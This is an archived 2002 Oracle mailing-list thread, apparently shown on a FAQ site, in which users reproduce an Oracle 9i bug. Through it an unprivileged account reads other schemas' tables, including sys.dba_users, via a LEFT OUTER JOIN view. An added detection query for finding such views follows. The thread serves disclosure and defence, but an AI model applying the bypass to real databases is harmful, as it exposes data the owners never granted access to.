Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 


Re: 9iDB Security Hole?

From: santosh sharma <santysharma_at_yahoo.com>
Date: Mon, 15 Apr 2002 11:48:47 -0700
Message-ID: <a9f7fq$2qdvn$1@ID-84096.news.dfncis.de>


looks like a BIG one
check this out
connect scott/tiger
select * from sys.dba_users a left outer join sys.dba_users on dba_users.user_id = a.user_id
Oracle 9.0.1.1.1 on NT

santy

"Vladimir M. Zakharychev" <bob_at_dpsp-yes.com> wrote in message news:a9et5g$9sa$1_at_babylon.agtel.net...
> Anyone with 9i can confirm this?
>
> From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> ...relcom.comp.dbms.oracle
>
>
> connect system/****@database
> CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> Grant Create Session To us1;
> Grant Create Session To us2;
> Grant Create Table To us1;
> grant unlimited tablespace to us1;
> Grant Create View To us2;
>
> Connect us1/us11_at_database;
> Create Table t1(c1 Number(1));
> Insert Into t1(c1) Values(9);
> Create Table t2(c1 Number(1));
> Insert Into t2(c1) Values(9);
>
> commit;
> Connect us2/us11_at_database;
>
> SQL> Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- this is expected
> SQL> Select * From us1.t2;
> ORA-00942: table or view does not exist
> -- this one too
> SQL> Create View aa As Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- and this one
> SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
> From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
>
> View created
> -- now this one is NOT !!!!!
> SQL> select * from aa;
>
> T1_C1 T2_C1
> ---- ----
> 9 9
>
>
> This effectively means that LEFT OUTER JOIN allows to create views
> on tables that are normally not visible (provided that unprivileged user
> knows table and column names).
> If you can confirm this basic example, can you also try it on system
> catalog tables/views? If you can not confirm, please specify your version
> and platform so that we know which ones are not affected (poster didn't
> specify version, but I suggest it's 9.0.1.1 on either NT or Linux).
>
> --
> Vladimir Zakharychev (bob_at_dpsp-yes.com)
> http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet
> applications.
> All opinions are mine and do not necessarily go in line with those of my
> employer.
>
>
>
Received on Mon Apr 15 2002 - 13:48:47 CDT
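A dictionary check a DBA could run after reading the report above, to find existing views whose owner holds no direct SELECT grant (to the owner or to PUBLIC) and no SELECT ANY TABLE system privilege on a base table in another schema that the view references. This is an added example and is not part of the original post; it assumes only the standard Oracle data dictionary views DBA_DEPENDENCIES, DBA_TAB_PRIVS, DBA_SYS_PRIVS and DBA_OBJECTS, and a session allowed to read them. Because CREATE VIEW normally requires the underlying privilege to be held directly rather than through a role, a view created through the outer-join bypass described above (us2.aa over us1.t1 and us1.t2 in the report) would appear in this result.

```sql
-- Added example, not from the original post.
-- Lists views that reference a table in another schema although the
-- view owner holds neither a direct SELECT object grant (own or PUBLIC)
-- nor the SELECT ANY TABLE system privilege. Run as SYS or as a user
-- with SELECT on the DBA_* views.
SELECT d.owner            AS view_owner,
       d.name             AS view_name,
       d.referenced_owner AS table_owner,
       d.referenced_name  AS table_name,
       o.status           AS view_status   -- VALID here is the suspicious case
  FROM dba_dependencies d
  JOIN dba_objects      o
    ON o.owner       = d.owner
   AND o.object_name = d.name
   AND o.object_type = 'VIEW'
 WHERE d.type             = 'VIEW'
   AND d.referenced_type  = 'TABLE'
   AND d.referenced_owner <> d.owner
   AND d.owner NOT IN ('SYS', 'SYSTEM')
   -- no direct object grant to the owner or to PUBLIC
   AND NOT EXISTS (SELECT 1
                     FROM dba_tab_privs p
                    WHERE p.grantee    IN (d.owner, 'PUBLIC')
                      AND p.owner      = d.referenced_owner
                      AND p.table_name = d.referenced_name
                      AND p.privilege  = 'SELECT')
   -- no blanket system privilege held directly
   AND NOT EXISTS (SELECT 1
                     FROM dba_sys_privs s
                    WHERE s.grantee   = d.owner
                      AND s.privilege = 'SELECT ANY TABLE')
 ORDER BY d.owner, d.name;
```

A view whose grant was simply revoked after creation is also listed, but Oracle marks it INVALID at the next recompile; a row with view_status = 'VALID' is the one to examine, since a valid view over a table the owner cannot read directly is exactly what the quoted reproduction produces. Dropping the view, or querying it as its owner, confirms whether the data is still reachable.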
